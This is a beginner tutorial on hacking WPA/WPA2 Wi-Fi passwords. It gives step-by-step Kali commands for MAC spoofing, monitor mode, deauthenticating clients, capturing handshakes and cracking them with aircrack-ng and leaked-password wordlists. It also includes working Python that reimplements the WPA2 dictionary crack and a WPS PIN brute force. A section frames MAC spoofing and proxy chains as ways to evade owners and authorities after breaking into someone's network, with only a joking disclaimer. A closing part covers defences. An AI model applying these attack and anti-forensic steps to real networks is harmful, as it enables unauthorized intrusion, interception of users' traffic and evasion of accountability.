WiFi Password Hacking for Beginners Table of Contents:
1) Setting up the lab. (WiFi Password Hacking for Beginners)
In this section you will learn how to set up a lab for Wi-Fi hacking. Your everyday operating system might be Windows, Linux or Mac OS X, but for this work you want a distribution built for penetration testing, such as Kali Linux (or its discontinued predecessor, BackTrack). These distributions ship with most of the common hacking and penetration-testing tools preinstalled, and the good news is that they are free.
In this article we are going to install and use Kali. Both BackTrack and Kali are Linux distributions; Kali is the successor of BackTrack and is the one still maintained, so it is the one to use. When we install Kali, the programs we need for hacking are already there. Perhaps you are worried that installing a new operating system is going to be a headache or is going to mess up your existing system. No worries: there are programs that let you run an operating system inside a virtual machine. The two well-known ones are VirtualBox and VMware Workstation. We are going to use VirtualBox because it is free and does everything we need.
VirtualBox is a free and open-source hypervisor that lets you run guest operating systems such as Windows, Linux and many others inside a window on your existing computer. So you do not need to install Kali on your computer at all: install it as a VirtualBox guest and use it like an ordinary computer.
First of all, download the latest version of VirtualBox from https://www.virtualbox.org/wiki/Downloads and install it.
If you are running Windows, download the build for Windows hosts; if you are running Linux or Mac OS X, download the respective build for your host. You also need the VirtualBox Extension Pack, available from the same download page. It adds USB 2.0/3.0 passthrough, which is what lets you hand a USB wireless adapter (and other USB devices) to the Kali virtual machine.
Install VirtualBox first, then double-click the Extension Pack file and click Install. The installation is straightforward, so I am not going to walk through it.
Once VirtualBox is installed, we need a Kali image to run in it. Why spend time installing when you can download an already installed Kali?
The easy way: on the Kali website there is a link to download prebuilt Kali virtual machine images; you simply import one of these into VirtualBox and start Kali.
A note on VirtualBox versions: the download page at https://www.virtualbox.org/wiki/Downloads lets you choose your host operating system. If your host is 32-bit, use VirtualBox 5.2, since 32-bit hosts were dropped in 6.0; version 5.2 remains supported for 32-bit hosts until July 2020. Better still, it is 2019: retire your 32-bit machines.
The Kali images come in VMware Workstation and VirtualBox flavours. Download the VirtualBox one regardless of your host operating system. Once the download finishes, open your Downloads folder and find the image you just downloaded; its extension is .ova. Double-click it to import it into VirtualBox and wait until the import finishes. Once the image is imported, select it and click the Settings button.
First go to System and set the RAM allocated to the virtual machine (Kali needs at least 2 GB), then go to System > Processor and set the number of CPUs.
It is very important to set up the wireless adapter correctly, because without it you will not be able to do any Wi-Fi hacking from Kali.
A virtual network adapter (NAT or "Bridged Adapter" under Network) gives the VM Internet access through your host, but it is not a real radio: the guest cannot put it into monitor mode or inject frames, so the Wi-Fi attacks in the later sections will not work over it. What you need is a USB wireless adapter whose chipset supports monitor mode and packet injection on Linux, attached to the VM under Settings > USB (add a USB filter for it; this is why the Extension Pack was installed). The adapter then shows up inside Kali as a wireless interface, typically wlan0.
Now you are ready to start the virtual machine.
Click “Start” and wait until the username prompt appears.
The default username is root and the default password is toor (on Kali releases from 2020.1 onwards the default account is kali with password kali instead). For security reasons we are going to change the password shortly.
On the left side there is a program called Terminal. Click on it and a black window appears with the prompt root@kali:~#.
You may ask what root means. root is the superuser account on Linux and Unix systems: it has full control over the machine and can do anything the computer is capable of, roughly like Administrator on Windows. If you are coming from a Windows background you may think of Administrator as the highest level of access, but on Linux or Unix of any flavour the highest level is root.
This is where we are going to run our commands. From the terminal, you can run programs easily and do whatever you want.
Our system may be out of date, so first run apt-get update and wait for the prompt to return.
apt-get is the program that updates the system and installs packages. apt-get update refreshes the list of available packages from the Kali repositories; it does not install anything by itself. To actually install the newer versions, follow it with apt-get upgrade (or apt-get full-upgrade; Kali is a rolling distribution, so this is the normal way to keep it current). Once the system is updated we need to change the password, because the default one is known to everyone.
To change the password, open the terminal and run passwd. Because you are logged in as root, it does not ask for the old password; it simply asks you to type a new password twice. Choose a strong one and remember it.
Power off the virtual machine cleanly: click the button in the upper-right corner and then the power-off icon. Everything is now set up, and we are ready to learn how to hide your identity and become harder to trace.
2) Hide Identity and Become Untraceable. (WiFi Password Hacking for Beginners)
In hacking it is very important to be hard to trace. Being able to break in is meaningless if you leave your identity behind. For example, imagine that you hacked someone's Wi-Fi without hiding your identity: within a few days the owner or the authorities can pull the router's logs, find the hardware address of the computer that attacked it, and eventually find you and throw you into a cell with a 7-foot cellmate named Tiny.
Hiding your identity and making the attack hard to trace is a crucial part of the whole session. In this section you will learn how to be anonymous, hide your identity and become much harder to trace.
Note: it goes without saying, you are breaking into your own home Wi-Fi network and not your neighbor's. :-)
What is a MAC address? – wifi password hacking
A MAC address (media access control address) is a unique identifier assigned to a NIC (network interface card) for communication on the local network segment. Every network interface has its own MAC address. It is burned into the device by the manufacturer, and its first three bytes (the OUI) identify that manufacturer. When your computer starts, the operating system reads the burned-in address from the hardware and keeps a copy in memory; it is this copy that the driver puts into every frame the interface sends. When you are connected to a wireless network, the access point sends frames to that address, and your computer reassembles them into web pages, videos, music, images and so on.
Imagine two computers connected to the same wireless network: the first wants google.com and the second wants amazon.com. The access point sends frames to both computers, so how does each computer know which frames to receive and which to ignore?
Computers decide which frames to receive by the MAC address: when the access point sends a frame to a computer, it writes the destination computer's MAC address into the frame. That, in a nutshell, is how wireless networks and computers talk to each other. It also means the router (and anyone capturing the air) keeps a record of your MAC address. So if you attack someone's wireless network without changing your MAC address, you let them identify your hardware by analyzing the network history. See computer forensics.
How to hide your MAC address? – wifi password hacking
You may be wondering how we can change the MAC address if the computer reads it from hardware. You are not going to modify the hardware; you are going to change the copy the operating system holds in memory (spoof the MAC address). Remember that the MAC address is read from the hardware into memory at boot.
Once the computer has started, the address the driver uses lives in the kernel's interface configuration, and that is what we change. After the change, anyone analyzing the router's logs or a capture finds only the fake address and cannot trace the attack back to a specific NIC. Note that the change is not permanent: the burned-in address comes back at reboot, so spoof it again every time. Now you have the basics: what a MAC address is, the danger of hacking without changing it, and how you can be traced. So how do we change it?
Change MAC address with Kali – wifi password hacking
Kali comes with a program called macchanger that changes the MAC address an interface uses. Remember that we chose Kali because it is designed for penetration testing and ships with tools like this.
Open VirtualBox, start the Kali virtual machine and open a terminal. The interface must be down before its MAC address can be changed, so type ifconfig wlan0 down. Here ifconfig is the program, wlan0 is our wireless interface and down is the action (option) we want. This command disconnects the interface wlan0 from any network, which is necessary before changing its MAC address. On newer Kali releases ifconfig may not be installed; ip link set wlan0 down does the same thing.
Then type macchanger --help. This tells Kali to run macchanger and print its help.
The --help output lists the program's options. In my case I will use a random MAC address by entering the following into the terminal:
macchanger --random wlan0
macchanger is the program name, --random (short form -r) is an option and wlan0 is the wireless interface name. The output shows the permanent (burned-in) MAC address with its vendor name in brackets, and below it the new, current MAC address, which has no vendor name because a fully random address does not belong to any registered OUI. Bring the interface back up with ifconfig wlan0 up (or ip link set wlan0 up) and confirm the new address with macchanger -s wlan0. Now that we have changed the MAC address, are we ready to start hacking? Not yet, because you do not know what monitor mode is and how to use it. In the next section you will learn what monitor mode is and how to use it with Kali.
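As an added example (not from the original guide and not macchanger's own code), the following Python shows what a spoofed address looks like on the wire and why a "fully random" address is still recognisable as fake: the second-lowest bit of the first octet marks an address as locally administered, and the first three bytes of a burned-in address are a registered vendor OUI. The generator mirrors macchanger's -r (random, locally administered bit set), -b/--bia (bit cleared) and -a/-A (real vendor prefix, random tail) behaviour as I understand it from its help text; the example addresses are made up.

```python
import os


def parse_mac(text: str) -> bytes:
    """Parse 'aa:bb:cc:dd:ee:ff' (colons or dashes, any case) into 6 raw bytes.
    Rejects anything that is not exactly six hex octets."""
    parts = text.strip().replace("-", ":").split(":")
    if len(parts) != 6 or not all(1 <= len(p) <= 2 for p in parts):
        raise ValueError(f"MAC address must have exactly 6 octets: {text!r}")
    return bytes(int(p, 16) for p in parts)


def format_mac(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def is_locally_administered(raw: bytes) -> bool:
    """Bit 1 (0x02) of the first octet: 1 = locally administered (software-assigned),
    0 = universally administered (burned-in; first three bytes are a registered OUI)."""
    return bool(raw[0] & 0x02)


def is_multicast(raw: bytes) -> bool:
    """Bit 0 (0x01) of the first octet: 1 = group address. A station's own
    address must be unicast, so a spoofed address must keep this bit clear."""
    return bool(raw[0] & 0x01)


def describe(text: str) -> dict:
    """What a forensic analyst sees in a router log or capture for this address."""
    raw = parse_mac(text)
    return {
        "mac": format_mac(raw),
        "oui": format_mac(raw[:3]),
        "locally_administered": is_locally_administered(raw),
        "multicast": is_multicast(raw),
    }


def random_mac(burned_in_look: bool = False) -> bytes:
    """Random unicast MAC in the style of `macchanger -r`: fully random, with the
    locally-administered bit set. burned_in_look mirrors macchanger's -b/--bia,
    which clears that bit so the address looks vendor-assigned (it still has no
    registered OUI, so a vendor lookup still flags it)."""
    raw = bytearray(os.urandom(6))
    raw[0] &= 0xFE                     # clear multicast bit: must be unicast
    if burned_in_look:
        raw[0] &= 0xFD                 # clear locally-administered bit
    else:
        raw[0] |= 0x02                 # set locally-administered bit
    return bytes(raw)


def random_mac_with_oui(oui_text: str) -> bytes:
    """Keep a real vendor prefix and randomise only the last three bytes, the idea
    behind `macchanger -a`/`-A`, which pick the prefix from a real vendor list."""
    prefix = parse_mac(oui_text + ":00:00:00")[:3]
    return prefix + os.urandom(3)


if __name__ == "__main__":
    print(describe("00:1b:63:84:45:e6"))            # constructed burned-in style address
    print(describe(format_mac(random_mac())))       # what `macchanger -r` produces
```

The practical point: a random address hides which NIC you own, but the locally-administered bit (or an OUI that matches no vendor) tells an analyst that the address was spoofed. If blending in matters, use a vendor prefix; if only unlinkability matters, fully random is fine.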
Changing your MAC address is only one way to avoid being identified, and it only covers the wireless part of the attack. A proxy or VPN hides your public IP address from Internet servers, making your traffic appear to come from another location. Keep the two straight: the capture and cracking in the next sections happen over the air and never touch the Internet, so a proxy does nothing for them; it matters for anything you later do on the Internet through the compromised network.
Tools such as proxychains can route a program's traffic through a chain of proxies in different countries, so that anyone tracing you has to deal with different ISPs, laws and jurisdictions. A chain is only as trustworthy as the proxies in it, and it is no substitute for staying off networks you are not authorized to test.
3) Wireless modes. (WiFi Password Hacking for Beginners)
To recover the key of a WPA/WPA2 network you need to capture the "handshake". The handshake is the four-message exchange (the WPA 4-way handshake) between a client and the access point when the client connects. In it, both sides exchange random nonces and prove, with a message integrity code (MIC), that they hold the same pre-shared key. The key itself is never sent, but the MIC can be checked offline against a password guess.
Once you have the handshake you no longer need to be in range of the Wi-Fi network: with the handshake and the network name (the SSID, explained later) you can crack the password offline.
To get the handshake you need to capture the frames flowing between the access point and the clients on the network. That raises a question: if the MAC address is used to make sure each frame is delivered to the right place, how can we capture frames meant for someone else? The answer is yes and no. In the default mode of a wireless card, managed mode, the card only hands your computer frames addressed to its own MAC address. There is, however, a mode that passes up every frame the card hears on its channel, not just the ones addressed to you, hence the name: monitor mode.
Now you know the basics and are ready to actually catch the handshake. First change your MAC address, then enter monitor mode with the following commands:
Here are the commands to switch your NIC (network interface card) into monitor mode. Type them line by line, each followed by Enter. Replace wlan0 with the name of your wireless interface (iwconfig with no arguments lists the wireless interfaces).
This shuts down the interface:
ifconfig wlan0 down
This changes the interface to monitor mode:
iwconfig wlan0 mode monitor
This brings the interface back up:
ifconfig wlan0 up
The last command shows the interface's wireless parameters (mode, frequency, SSID) and statistics; iwconfig can also set those parameters, which is what we used it for above:
iwconfig wlan0
The output should now show Mode:Monitor. Alternatively, run airmon-ng check kill (to stop NetworkManager and wpa_supplicant, which otherwise keep switching the card back to managed mode) followed by airmon-ng start wlan0; this creates a separate monitor interface named wlan0mon, which is the interface name used in the examples in the next sections. Either way, you are now ready to capture the handshake, after which cracking the key is a matter of a wordlist (also called a dictionary).
NOTE: The Wi-Fi password is not literally inside the handshake; what the handshake contains is enough to test password guesses against it offline. :-)
4) Catching the handshake (WiFi Password Hacking for Beginners)
Handshake messages are sent every time a client associates with the target AP, so to capture them we are going to capture every frame sent on the AP's channel. For this we use airodump-ng, which sniffs and saves wireless frames; it is preinstalled in Kali as part of the aircrack-ng suite. There are two steps to catching the handshake.
1) Start airodump-ng on the target AP (Access Point):
The syntax and example look something like this:
Syntax: airodump-ng --channel [channel] --bssid [bssid] --write [file-prefix] [interface]
Example: airodump-ng --channel 6 --bssid 11:22:33:44:55:66 --write out wlan0mon
Run airodump-ng wlan0mon with no filters first to list nearby networks with their BSSID, channel and connected clients, then restart it locked to the target as above. The --write prefix out makes it save the capture as out-01.cap (the number increases on each run).
2) Wait for a client to connect to the access point, or de-authenticate a client that is already connected (if any) so that its system reconnects automatically and performs a new handshake. Leave airodump-ng running and send the deauthentication frames from a second terminal:
The syntax and example look something like this:
Syntax: aireplay-ng --deauth [number of deauth frames] -a [AP bssid] -c [client MAC] [interface]
Example: aireplay-ng --deauth 5 -a 11:22:33:44:55:66 -c 00:AA:11:22:33:44 wlan0mon
A handful of frames is enough (0 means send continuously, which is noisy and needlessly disruptive). The monitor interface must be on the AP's channel, which it is while airodump-ng is locked to it.
When the handshake is caught, airodump-ng tells you: the top-right corner of its output says "WPA handshake:" followed by the AP's MAC address.
Follow these steps until that message appears.
Once you have the handshake, you are ready to crack the Wi-Fi password. As explained earlier, the handshake does not contain the password itself, but it lets us test guesses against it. :-)
5) Cracking any wireless network. (WiFi Password Hacking for Beginners)
Now that you have the handshake you need a wordlist to guess the password from. One of the largest publicly available ones is CrackStation's, which you can download from the following website:
There are two versions of this wordlist.
- CrackStation's main password cracking dictionary (1,493,677,782 words, 15 GB).
- CrackStation's smaller list of just the "real human" passwords leaked from various website databases. It contains about 64 million passwords.
What’s in the password/wordlist/dictionary list?
The list contains every wordlist, dictionary, and password database leak that could be found on the internet. It also contains every word in the Wikipedia databases (pages-articles, retrieved 2010, all languages) as well as lots of books from Project Gutenberg. It also includes the passwords from some low-profile database breaches that were being sold in the underground years ago.
The format of the list is a plain text file, one entry per line, sorted in case-insensitive alphabetical order. Lines are separated with a newline ("\n") character.
You can test the list without downloading it by submitting SHA256 hashes to CrackStation's free online hash cracker; their site also reports the results of running the list against the LinkedIn and eHarmony password hash leaks.
According to CrackStation, the list cracks about 30% of the hashes submitted to the service, a figure to take with a grain of salt because some people submit hashes of trivially weak passwords just to test it, and others only arrive after trying other online crackers. Using the list, CrackStation cracked 49.98% of one customer's set of 373,000 human password hashes, which motivated that customer's move to a better salting scheme.
Once you have a wordlist, you are ready to crack the Wi-Fi key. We are going to use aircrack-ng for this.
aircrack-ng takes each candidate password from the wordlist and combines it with the network name (ESSID) to compute the pairwise master key (PMK) using PBKDF2-HMAC-SHA1 with 4096 iterations. From the PMK, together with the two MAC addresses and the two nonces taken from the captured handshake, it derives the pairwise transient key (PTK), and with the first 16 bytes of the PTK (the KCK) it recomputes the message integrity code (MIC) of a handshake message. If the recomputed MIC matches the MIC in the capture, the candidate is the password. The PBKDF2 step is deliberately slow, which is why cracking speed is measured in thousands of keys per second per CPU core rather than millions.
The syntax and example looks like this:
Syntax: aircrack-ng -w [wordlist] -b [bssid] [capture file]
Example: aircrack-ng -w list -b 11:22:33:44:55:66 out-01.cap
There is no interface argument: cracking is entirely offline. out-01.cap is the file airodump-ng wrote above, and -b selects the target network if the capture contains more than one.
Run the command and wait for aircrack-ng to work through the list. When the password is found, aircrack-ng prints KEY FOUND! followed by the passphrase.
Congratulations!!! You have just hacked a WPA secured wireless network!!! :-)
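As an added example (not part of the original guide, and not aircrack-ng's own code), the following Python reimplements the check described above, so you can see exactly what the wordlist is tested against. It also classifies EAPOL-Key frames by their key-info flags, which is how a capture tool decides it has messages 1 and 2 of the same handshake (the check behind the "WPA handshake" message in section 4). The SSID, MAC addresses, nonces and passphrase are constructed for the demonstration; a legitimate message 2 is built with the real passphrase and then attacked with a wordlist.

```python
import hashlib
import hmac

# --- Key derivation as in IEEE 802.11i (WPA2-PSK with CCMP) -----------------------

def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes).
    This is the slow step that limits cracking speed."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11 PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ..."""
    out, i = b"", 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def wpa2_ptk(pmk: bytes, ap_mac: bytes, client_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK (48 bytes for CCMP). Its first 16 bytes are the KCK, which keys the handshake MIC."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf(pmk, b"Pairwise key expansion", data, 48)


# --- EAPOL-Key frame layout (offsets from the start of the 802.1X header) ----------
NONCE_OFFSET = 17   # header(4) + descriptor type(1) + key info(2) + key length(2) + replay counter(8)
MIC_OFFSET = 81     # NONCE_OFFSET + nonce(32) + key IV(16) + RSC(8) + key ID(8)


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    """Key descriptor v2 (WPA2/AES): MIC = HMAC-SHA1 over the frame with the MIC field zeroed, cut to 16 bytes."""
    zeroed = eapol_frame[:MIC_OFFSET] + b"\x00" * 16 + eapol_frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def handshake_message_number(eapol_frame: bytes) -> int:
    """Identify message 1-4 of the 4-way handshake from the key-info flags
    (Install = bit 6, Ack = bit 7, MIC = bit 8, Secure = bit 9)."""
    info = int.from_bytes(eapol_frame[5:7], "big")
    install, ack, mic, secure = info & 0x0040, info & 0x0080, info & 0x0100, info & 0x0200
    if ack and not mic:
        return 1            # AP -> client: carries ANonce
    if mic and not ack and not secure:
        return 2            # client -> AP: carries SNonce and the first MIC
    if ack and mic and install:
        return 3
    return 4


def crack(ssid, ap_mac, client_mac, msg1, msg2, wordlist):
    """The dictionary attack: derive PMK -> PTK -> MIC for each candidate and compare
    with the MIC in message 2. Returns the passphrase, or None if it is not in the list."""
    if handshake_message_number(msg1) != 1 or handshake_message_number(msg2) != 2:
        raise ValueError("need EAPOL-Key messages 1 and 2 of the same handshake")
    anonce = msg1[NONCE_OFFSET:NONCE_OFFSET + 32]
    snonce = msg2[NONCE_OFFSET:NONCE_OFFSET + 32]
    captured_mic = msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        kck = wpa2_ptk(wpa2_pmk(candidate, ssid), ap_mac, client_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, msg2), captured_mic):
            return candidate
    return None


# --- A constructed handshake to run the attack against (all values made up) ---------

def build_eapol_key(key_info: int, nonce: bytes, mic: bytes = b"\x00" * 16) -> bytes:
    body = (b"\x02"                                  # descriptor type: RSN (WPA2)
            + key_info.to_bytes(2, "big")
            + b"\x00\x10"                            # key length 16 (CCMP)
            + (1).to_bytes(8, "big")                 # replay counter
            + nonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # nonce, key IV, RSC, key ID
            + mic + b"\x00\x00")                     # MIC, key data length 0
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body   # 802.1X v2, type 3 = EAPOL-Key

SSID = "HomeLab"                                     # constructed
AP_MAC = bytes.fromhex("112233445566")               # constructed
CLIENT_MAC = bytes.fromhex("00aa11223344")           # constructed
PASSPHRASE = "correct horse battery"                 # constructed network key
ANONCE = hashlib.sha256(b"constructed anonce").digest()
SNONCE = hashlib.sha256(b"constructed snonce").digest()


def build_constructed_handshake():
    """Messages 1 and 2 as the AP and a legitimate client would produce them with PASSPHRASE."""
    msg1 = build_eapol_key(0x008A, ANONCE)           # pairwise | ack | descriptor version 2
    unsigned = build_eapol_key(0x010A, SNONCE)        # pairwise | mic | descriptor version 2
    kck = wpa2_ptk(wpa2_pmk(PASSPHRASE, SSID), AP_MAC, CLIENT_MAC, ANONCE, SNONCE)[:16]
    msg2 = unsigned[:MIC_OFFSET] + eapol_mic(kck, unsigned) + unsigned[MIC_OFFSET + 16:]
    return msg1, msg2


def demo(wordlist):
    msg1, msg2 = build_constructed_handshake()
    return crack(SSID, AP_MAC, CLIENT_MAC, msg1, msg2, wordlist)


if __name__ == "__main__":
    print(demo(["password", "letmein", "correct horse battery", "qwerty"]))
```

Two things this makes obvious: the MIC is a one-way function of the passphrase, so a capture gives an attacker an unlimited offline oracle but never the passphrase itself; and every guess costs 4096 HMAC-SHA1 rounds, so a passphrase that is not in any wordlist is out of reach of this attack.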
It is now time to secure our own wireless network, because as you have seen this attack is simple, and if someone does it to your Wi-Fi they get more than free Internet. With the key and a capture of a client's handshake they can decrypt that client's traffic and read it: anything sent without TLS (plain HTTP logins, old mail protocols) is exposed, and they are inside your LAN with your printers, file shares and smart devices. A weakly secured wireless network is dangerous.
In the next section you will learn how to secure your network against these attacks.
6) Securing Your Network From The Aforementioned Attacks. (WiFi Password Hacking for Beginners)
Now that we know how to test the security of the common wireless encryption schemes (WEP, WPA and WPA2), securing our networks against these attacks is relatively easy, because we know the weaknesses an attacker uses. WPA3, introduced in 2018, replaces the pre-shared-key handshake with SAE, which does not give an eavesdropper material for an offline dictionary attack; use it where your router and clients support it. Let us look at each of the older schemes in turn:
1. WEP: WEP is an old and really weak scheme. Although this guide does not cover it, there are a number of well-known attacks (also implemented in the aircrack-ng suite) that recover the key regardless of the strength of the password and even when nobody is connected to the network. These attacks are possible because of the way WEP works (a short initialization vector reused with the RC4 stream cipher), and some of them recover the key in a few minutes. The fix is simply never to use WEP.
2. WPA/WPA2: WPA and WPA2 are very similar; the main difference is the cipher used to encrypt the traffic (TKIP versus AES-CCMP), while the handshake and key derivation work the same way. WPA/WPA2 keys can be obtained in two ways:
- If WPS is enabled, there is a high chance of obtaining the key regardless of its complexity, by exploiting a weakness in the WPS feature. WPS lets users join the network without typing the key, either by pressing a button on the router and on the device, or by entering an eight-digit PIN. The PIN is the problem: its last digit is a checksum, and the protocol confirms the first four digits and the remaining three separately, so an attacker needs at most 10,000 + 1,000 = 11,000 guesses instead of 100,000,000. A tool such as reaver brute-forces the PIN online (on a router with no lockout this takes hours, around 10 on average), and once the PIN is accepted the router hands over the actual WPA/WPA2 passphrase. So this is not a weakness in WPA/WPA2 itself but in a feature that can be enabled on routers that use it. The fix is to disable WPS PIN authentication on the router.
- If WPS is not enabled, the way to crack WPA/WPA2 is the dictionary attack shown above (often loosely called brute force): a list of candidate passwords is tested against the captured handshake to see whether any of them is the network's key. (A newer variant uses the PMKID that some access points include in the first handshake message, so no connected client is needed, but it still needs a wordlist.) If the password is not in the wordlist, the attacker does not find it. So the defence is a long, random passphrase that no wordlist will contain, together with WPS disabled and WPA2 (AES-CCMP) or WPA3 selected on the router.
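As an added example (not from the original guide, and not reaver's code), the following Python shows why the WPS PIN is so weak: the checksum digit is computed the way wpa_supplicant does it, and the split brute force is simulated against a constructed registrar that, like a real access point without lockout, confirms each half of the PIN separately. The secret PIN and the registrar are made up for the demonstration.

```python
def wps_checksum_digit(first_seven: int) -> int:
    """Checksum digit of a WPS PIN: the digits of the 7-digit prefix are weighted
    3, 1, 3, 1, ... from the right, and the checksum makes the weighted sum a multiple of 10."""
    accum = 0
    while first_seven:
        accum += 3 * (first_seven % 10)
        first_seven //= 10
        accum += first_seven % 10
        first_seven //= 10
    return (10 - accum % 10) % 10


def is_valid_wps_pin(pin: str) -> bool:
    """An 8-digit PIN is well-formed only if its last digit is the checksum of the first seven."""
    if len(pin) != 8 or not pin.isdigit():
        return False
    return int(pin[7]) == wps_checksum_digit(int(pin[:7]))


def split_brute_force(first_half_ok, second_half_ok):
    """The attack reaver automates. The registrar protocol reveals in message M4 whether
    the first four digits are right and in M6 whether the last four are, so the halves
    are guessed independently: at most 10,000 tries for the first half, then at most
    1,000 for the second because its last digit is fixed by the checksum.
    Returns (pin, attempts), or (None, attempts) if the oracles never agree."""
    attempts = 0
    for first in range(10_000):
        attempts += 1
        if first_half_ok(first):
            break
    else:
        return None, attempts
    for tail in range(1_000):
        second = tail * 10 + wps_checksum_digit(first * 1_000 + tail)
        attempts += 1
        if second_half_ok(first, second):
            return f"{first:04d}{second:04d}", attempts
    return None, attempts


def make_constructed_registrar(secret_pin: str):
    """Simulates an access point with no lockout: two oracles answering the half-PIN checks."""
    first, second = int(secret_pin[:4]), int(secret_pin[4:])
    return (lambda f: f == first,
            lambda f, s: f == first and s == second)


if __name__ == "__main__":
    print(split_brute_force(*make_constructed_registrar("12345670")))
```

With a secret PIN of 12345670 the simulation needs 1,803 guesses; the worst case is 11,000. Compare that with the 100,000,000 PINs that an 8-digit space appears to offer. Modern routers add a lockout after a few failed attempts, which slows the attack down but does not change the arithmetic, so disabling the PIN method is the real fix.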